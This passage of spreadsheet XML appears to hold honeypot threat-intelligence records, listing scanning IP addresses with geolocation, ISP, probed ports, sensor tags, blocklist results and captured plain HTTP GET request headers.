    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;59750&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>River Valley</t>
  </si>
  <si>
    <t>11237888</t>
  </si>
  <si>
    <t>1.29606</t>
  </si>
  <si>
    <t>103.836</t>
  </si>
  <si>
    <t>17547</t>
  </si>
  <si>
    <t>M1 NET LTD</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:817e:cf41</t>
  </si>
  <si>
    <t>6c71765ff5a9d9944029d6ab22d64ef8</t>
  </si>
  <si>
    <t>122.117.58.73</t>
  </si>
  <si>
    <t>NA&amp;&amp;122-117-58-73.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;NA&amp;&amp;23&amp;&amp;3710&amp;&amp;8172&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:3a49</t>
  </si>
  <si>
    <t>314e6f71af14f7a00afb5addf68bad17</t>
  </si>
  <si>
    <t>59.183.24.99</t>
  </si>
  <si>
    <t>Khanna</t>
  </si>
  <si>
    <t>1267016</t>
  </si>
  <si>
    <t>30.7055</t>
  </si>
  <si>
    <t>76.222</t>
  </si>
  <si>
    <t>::ffff:3bb7:1863</t>
  </si>
  <si>
    <t>7c6de816f3525b9aaeed20501922f74e</t>
  </si>
  <si>
    <t>113.61.206.38</t>
  </si>
  <si>
    <t>NA&amp;&amp;113-61-206-38.veetime.com</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>23&amp;&amp;35059&amp;&amp;35076&amp;&amp;9100</t>
  </si>
  <si>
    <t>24.1245</t>
  </si>
  <si>
    <t>2008-11-06</t>
  </si>
  <si>
    <t>::ffff:713d:ce26</t>
  </si>
  <si>
    <t>89185418731ed2108ddaaf2891b4de08</t>
  </si>
  <si>
    <t>125.229.18.252</t>
  </si>
  <si>
    <t>125-229-18-252.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_SOCKS5_H23&amp;&amp;SMA-LAB_PJL_H21&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;5900&amp;&amp;80&amp;&amp;445&amp;&amp;1080&amp;&amp;9100&amp;&amp;389&amp;&amp;25236&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:12fc</t>
  </si>
  <si>
    <t>ce8ef4afdaf85812e9c759fb8c1e3a87</t>
  </si>
  <si>
    <t>1.170.66.3</t>
  </si>
  <si>
    <t>::ffff:1aa:4203</t>
  </si>
  <si>
    <t>d1e5d83396551ebc9f0dbcffe7b87e48</t>
  </si>
  <si>
    <t>196.251.72.115</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H40</t>
  </si>
  <si>
    <t>{'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'spam']}</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '154.90.63.129', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '193.57.138.110', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '156.244.8.69', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '38.60.209.6', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '156.244.37.11', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '38.54.79.122', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '193.57.136.113', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '154.93.37.45', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '185.255.123.181', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '185.234.67.80', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '38.60.224.106', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '109.123.229.33', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '149.102.153.168', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '45.14.244.111', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '94.131.113.33', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'keep-alive', 'Host': '94.131.8.76', 'Keep-Alive': '300', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:c4fb:4873</t>
  </si>
  <si>
    <t>008c8cd1e242a10e0ee99925d1a67502</t>
  </si>
  <si>
    <t>151.45.98.166</t>
  </si>
  <si>
    <t>Apulia</t>
  </si>
  <si>
    <t>Bari</t>
  </si>
  <si>
    <t>Rutigliano</t>
  </si>
  <si>
    <t>3168775</t>
  </si>
  <si>
    <t>41.01</t>
  </si>
  <si>
    <t>17.0056</t>
  </si>
  <si>
    <t>INFOSTRADA</t>
  </si>
  <si>
    <t>WIND Telecomunicazioni S.p.A</t>
  </si>
  <si>
    <t>::ffff:972d:62a6</t>
  </si>
  <si>
    <t>46fb11505b99297f1fe741bfb9b91a73</t>
  </si>
  <si>
    <t>116.241.67.122</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>TBCNET</t>
  </si>
  <si>
    <t>2010-12-17</t>
  </si>
  <si>
    <t>::ffff:74f1:437a</t>
  </si>
  <si>
    <t>8387b004d9c552b86d607352c76901ac</t>
  </si>
  <si>
    <t>122.117.41.146</t>
  </si>
  <si>
    <t>122-117-41-146.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H41&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;780&amp;&amp;23&amp;&amp;63205&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:2992</t>
  </si>
  <si>
    <t>53ae51b0bc69f5b069f595c1c4198a83</t>
  </si>
  <si>
    <t>114.33.46.68</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-46-68.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;41829&amp;&amp;23&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:2e44</t>
  </si>
  <si>
    <t>75f7c61abbb52e750c6bfeb668da7f85</t>
  </si>
  <si>
    <t>59.183.151.190</t>
  </si>
  <si>
    <t>::ffff:3bb7:97be</t>
  </si>
  <si>
    <t>a4911a2d8e9d47325182504b7075246d</t>
  </si>
  <si>
    <t>125.228.37.189</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-37-189.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;10093&amp;&amp;23&amp;&amp;50920&amp;&amp;33808&amp;&amp;33819&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de4:25bd</t>
  </si>
  <si>
    <t>51076e225da4cc561328e6972b38195b</t>
  </si>
  <si>
    <t>61.2.165.33</t>
  </si>
  <si>
    <t>::ffff:3d02:a521</t>
  </si>
  <si>
    <t>0e502ef239d88fe2a305d80871604e52</t>
  </si>
  <si>
    <t>122.117.122.47</t>
  </si>
  <si>
    <t>NA&amp;&amp;122-117-122-47.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;29422&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
